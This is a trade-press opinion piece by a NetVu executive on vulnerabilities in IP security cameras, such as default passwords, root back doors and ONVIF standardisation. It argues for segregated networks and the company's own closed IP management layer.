As traditional CCTV Cameras are increasingly being replaced by IP security cameras and stories of them being hacked grow, Mike Newton looks at the price of open IP Security Cameras.
The price of open IP security cameras?
The press is full of IP CCTV cameras being hacked or suggestions they have “back doors” built into them. What is clear is with the rise of the Internet of Things and a desire to get products to market as quickly and cheaply as possible, unnecessary vulnerabilities are being left in many devices. Mike Newton Chief Technical Officer, NetVu Limited examines the vulnerabilities from a technical perspective, for Security News Desk and SecurityMiddleEast.com.
Concerns arise from CCTV devices being compromised by any attacker and risks of utilising generic open source services and libraries in an 'unattended' security appliance such as a camera. This is of course seriously compromised further when there are fixed root shell passwords that could be used as ‘back doors’, or we find widely publicised generic passwords. It is vital that a multi-tiered approach is taken to CCTV security. Segregation of networks is a key element, ideally with no direct network routing from camera endpoints to the corporate network or the public internet, as well as providing access permissions and stringent firewall services.
The current 'default' Video Management System (VMS) driven approach has been woefully lacking in addressing these fundamental points. The principle has been that a central VMS provides camera configuration and management credentials, however those individual cameras are directly accessed by the users. Equally the storage solution, NVR or similar, accesses IP cameras directly over the network.
The very fact that there is access between users and appliances directly makes for a more troublesome firewall configuration as there is a path between every user and every device - even when those devices are located in insecure locations outside the building. Some have adopted the solution of installing a separate CCTV network completely isolated from the main network, physically and operationally. This must surely be a retrograde step which fails to leverage the benefits of centralisation, and falls short of properly addressing the base technology architecture.
A favoured solution, used by NetVu, is a secure IP management layer which automatically creates secure VLANS fully segregated from the corporate network on a non-routable sub network, and then all accesses between users and the images are only achieved by very specific gateways that can be managed and controlled to limit any cyber-attacks. This Closed IP management layer has been applied over and above a conventional IP infrastructure in order to provide that same specialised security protection that Closed Circuit achieved in analogue CCTV.
The drive for open standards and interoperability, championed by ONVIF and others, are only there for commercial supply line convenience, and in fact are directly contradictory to the needs of overall security. The application of generic services, and on occasions 'root level' back doors, most often left in by accident, means that devices can be compromised in a totally generic manner, with no specific knowledge of that particular device’s operation or architecture. Far from simply utilizing generic services that leave a massive resource of attack vulnerabilities open, manufacturers should seek to implement their own 'Command Line Shell' structures limited to the relevant needs only.
As a minimum, a customised additional protocol layer should be applied on any service that allows access to those services and functions only as explicitly required. This is rather than the complete freedom provided by example of a Linux 'bash' shell, allowing for example the addition of malicious firmware and the alteration of access credentials and complete system access.
While any solution can be hacked with sufficient time and knowledge, all that 'standardisation' such as ONVIF has created is a platform whereby a single hacking tool, the creation of which is assisted by masses of public information and open source software, can then compromise the majority of cameras using the same techniques. The ability and return on having to create individual tools for each family of devices creates a far greater impediment to the widespread availability of such tools.
For some time, poorly controlled IP surveillance devices have represented a grave risk of becoming the 'enemy within'. The rise of often randomly deployed 'Internet of Things' IoT devices also with default user credentials will make this situation even worse, as they share the same basic operating and interface structures as other IP devices, and so the scope for your IP surveillance devices being 'recruited' and compromised as part of a cyberbot army is increasing daily.
All manufacturers should be promoting well defined, easy to implement defensive solutions as an implicit and fundamental part of their solution to protect both the user and the IP appliances themselves from any such attacks - whether originating from a foreign power owned entity or any other cyber attacker.
Any solution that relies or offers generic corporate IP addresses to individual IP surveillance appliances should be treated with the highest levels of caution - and this applies to the vast majority of VMS based solutions on the market. The latest media attention brings these issues into focus and the user should take action now to review their systems and deploy safe and secure IP systems which do not contain any vulnerabilities.